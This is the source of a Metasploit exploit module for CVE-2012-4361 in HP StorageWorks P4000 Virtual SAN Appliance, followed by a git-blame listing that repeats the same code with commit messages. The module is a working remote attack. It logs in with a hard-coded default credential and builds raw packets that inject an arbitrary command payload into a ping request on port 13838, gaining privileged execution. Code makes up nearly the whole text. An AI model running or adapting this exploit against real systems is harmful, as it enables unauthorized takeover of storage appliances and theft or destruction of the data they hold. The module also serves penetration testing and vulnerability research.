metasploit-framework/modules/exploits/multi/misc/hp_vsa_exec.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
      'Description'    => %q{
          This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
        versions prior to 9.5. By using a default account credential, it is possible
        to inject arbitrary commands as part of a ping request via port 13838.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Nicolas Gregoire',  #Discovery, PoC, additional assistance
          'sinn3r'             #Metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2012-4361'],
          ['OSVDB', '82087'],
          ['EDB', '18893'],
          ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],
          ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],
          ['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure
        ],
      'Payload'        =>
        {
          'BadChars' => "/",
          'Compat'   =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet'
            }
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic',        {} ],
          [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
          [ 'HP VSA 9',         { 'Version' => '9.0.0' } ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Nov 11 2011",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote port', 13838])
      ], self.class)
  end


  def generate_packet(data)
    pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"
    pkt << [data.length + 1].pack("N*")
    pkt << "\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"
    pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"
    pkt << data
    pkt << "\x00"

    pkt
  end

  def get_target
    if target.name !~ /Automatic/
      return target
    end

    # Login at 8.5.0
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
    print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res
    if res and res=~ /OK/ and res=~ /Login/
      return targets[1]
    end

    # Login at 9.0.0
    packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
    print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res
    if res and res=~ /OK/ and res =~ /Login/
      return targets[2]
    end

    fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
  end

  def exploit
    connect

    if target.name =~ /Automatic/
      my_target = get_target
      print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
    else
      my_target = target
      print_status("#{rhost}:#{rport} Sending login packet")
      packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
      sock.put(packet)
      res = sock.get_once
      vprint_status(Rex::Text.to_hex_dump(res)) if res
    end

    # Command execution
    print_status("#{rhost}:#{rport} Sending injection")
    data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
    data << "64/5/" if my_target.name =~ /9/
    packet = generate_packet(data)
    sock.put(packet)
    res = sock.get_once
    vprint_status(Rex::Text.to_hex_dump(res)) if res

    handler
    disconnect
  end
end
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 19:53:45 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add HP StorageWorks VSA command execution vulnerability 2012-05-19 19:53:45 +00:00			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",`
			`'Description' => %q{`
			`This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on`
			`versions prior to 9.5. By using a default account credential, it is possible`
			`to inject arbitrary commands as part of a ping request via port 13838.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Nicolas Gregoire', #Discovery, PoC, additional assistance`
			`'sinn3r' #Metasploit module`
			`],`
			`'References' =>`
			`[`
			`['CVE', '2012-4361'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`['OSVDB', '82087'],`
Retab modules 2013-08-30 21:28:54 +00:00			`['EDB', '18893'],`
			`['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],`
			`['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],`
			`['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure`
			`],`
			`'Payload' =>`
			`{`
			`'BadChars' => "/",`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
Fix #5659: Update CMD exploits payload compatibility options 2015-08-10 22:12:59 +00:00			`'RequiredCmd' => 'generic perl telnet'`
Retab modules 2013-08-30 21:28:54 +00:00			`}`
			`},`
			`'DefaultOptions' =>`
			`{`
change exitfunc to thread 2015-09-01 08:43:45 +00:00			`'EXITFUNC' => 'thread'`
Retab modules 2013-08-30 21:28:54 +00:00			`},`
Prefer Ruby style for single word collections According to the Ruby style guide, %w{} collections for arrays of single words are preferred. They're easier to type, and if you want a quick grep, they're easier to search. This change converts all Payloads to this format if there is more than one payload to choose from. It also alphabetizes the payloads, so the order can be more predictable, and for long sets, easier to scan with eyeballs. See: https://github.com/bbatsov/ruby-style-guide#collections 2013-09-24 17:33:31 +00:00			`'Platform' => %w{ linux unix },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Arch' => ARCH_CMD,`
			`'Targets' =>`
			`[`
			`[ 'Automatic', {} ],`
			`[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],`
			`[ 'HP VSA 9', { 'Version' => '9.0.0' } ]`
			`],`
			`'Privileged' => true,`
			`'DisclosureDate' => "Nov 11 2011",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptPort.new('RPORT', [true, 'The remote port', 13838])`
			`], self.class)`
			`end`


			`def generate_packet(data)`
			`pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"`
			`pkt << [data.length + 1].pack("N*")`
			`pkt << "\x00\x00\x00\x00"`
			`pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"`
			`pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"`
			`pkt << data`
			`pkt << "\x00"`

			`pkt`
			`end`

			`def get_target`
			`if target.name !~ /Automatic/`
			`return target`
			`end`

			`# Login at 8.5.0`
			`packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")`
			`print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
			`if res and res=~ /OK/ and res=~ /Login/`
			`return targets[1]`
			`end`

			`# Login at 9.0.0`
			`packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")`
			`print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
			`if res and res=~ /OK/ and res =~ /Login/`
			`return targets[2]`
			`end`

			`fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")`
			`end`

			`def exploit`
			`connect`

			`if target.name =~ /Automatic/`
			`my_target = get_target`
			`print_good("#{rhost}:#{rport} - Target #{my_target.name} found")`
			`else`
			`my_target = target`
			`print_status("#{rhost}:#{rport} Sending login packet")`
			`packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`
			`end`

			`# Command execution`
			`print_status("#{rhost}:#{rport} Sending injection")`
			`data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"`
			`data << "64/5/" if my_target.name =~ /9/`
			`packet = generate_packet(data)`
			`sock.put(packet)`
			`res = sock.get_once`
			`vprint_status(Rex::Text.to_hex_dump(res)) if res`

			`handler`
			`disconnect`
			`end`
Noting rhost/rport, cli.peerhost where appropriate There's no msftidy check for this, and it's irritating to have to remember to do this all the time. 2012-05-21 16:19:02 +00:00			`end`